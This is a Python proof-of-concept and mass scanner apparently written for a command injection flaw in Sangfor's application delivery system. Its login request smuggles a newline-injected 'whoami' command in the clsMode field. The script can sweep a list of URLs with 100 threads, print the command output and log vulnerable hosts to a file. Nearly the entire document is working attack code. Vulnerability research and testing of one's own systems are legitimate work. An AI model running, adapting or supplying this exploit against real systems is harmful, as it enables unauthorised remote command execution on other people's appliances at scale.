import requests,argparse,sys,json,re,time,os
from multiprocessing.dummy import Pool
# 关闭警告
requests.packages.urllib3.disable_warnings()


# 横幅
def banner():
    test = """    
███████╗██╗  ██╗███████╗███╗   ██╗██╗  ██╗██╗███╗   ██╗
██╔════╝██║  ██║██╔════╝████╗  ██║╚██╗██╔╝██║████╗  ██║
███████╗███████║█████╗  ██╔██╗ ██║ ╚███╔╝ ██║██╔██╗ ██║
╚════██║██╔══██║██╔══╝  ██║╚██╗██║ ██╔██╗ ██║██║╚██╗██║
███████║██║  ██║███████╗██║ ╚████║██╔╝ ██╗██║██║ ╚████║
╚══════╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝
                                        author:hqy
                                        version:1.0.0           
"""
    print(test)


def main():
    banner()
# 处理命令行参数
    # 初始化 
    parser = argparse.ArgumentParser(description="深信服应用交付系统命令执行漏洞")
    
    # 添加参数
    parser.add_argument('-u','--url',dest='url',type=str,help='input your url')
    parser.add_argument('-f','--file',dest='file',type=str,help='input your file')


    args = parser.parse_args()

    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list = []
        with open(args.file,'r',encoding='utf-8') as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp = Pool(100)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")


def poc(target):
    payload = '/rep/login'
    headers = {
        'Content-Length':'124',
        'Sec-Ch-Ua':'"Not/A)Brand";v="99","GoogleChrome";v="115","Chromium";v="115"',
        'Accept':'*/*',
        'Content-Type':'application/x-www-form-urlencoded;charset=UTF-8',
        'X-Requested-With':'XMLHttpRequest',
        'Sec-Ch-Ua-Mobile':'?0',
        'User-Agent':'Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/115.0.0.0Safari/537.36',
        'Sec-Ch-Ua-Platform':'"Windows"',
        'Origin':'https://1.1.1.1',
        'Sec-Fetch-Site':'same-origin',
        'Sec-Fetch-Mode':'cors',
        'Sec-Fetch-Dest':'empty',
        'Referer':'https://1.1.1.1:85/rep/login',
        'Accept-Encoding':'gzip,deflate',
        'Accept-Language':'zh-CN,zh;q=0.9',
        'Connection':'close',
    }
    data = 'clsMode=cls_mode_login%0Awhoami%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123'
    try:
        res = requests.post(url=target+payload,headers=headers,data=data,verify=False)
        match = re.search(r'\|(.*?)$',res.text,re.S)
        # print(match)
        if match:
                if 'API-CT_SYS_FAIL_LIST' in res.text:
                    print(f"[+]{target}存在漏洞")
                    print(f"[+]{target}命令执行结果为：{match.group(0)}")
                    with open('result.txt','a',encoding='utf-8') as fp:
                        fp.write(target+'\n')
                else:
                    print(f"[-]{target}不存在漏洞")
    except:
        pass

# 函数入口
if __name__ == "__main__":
    main()
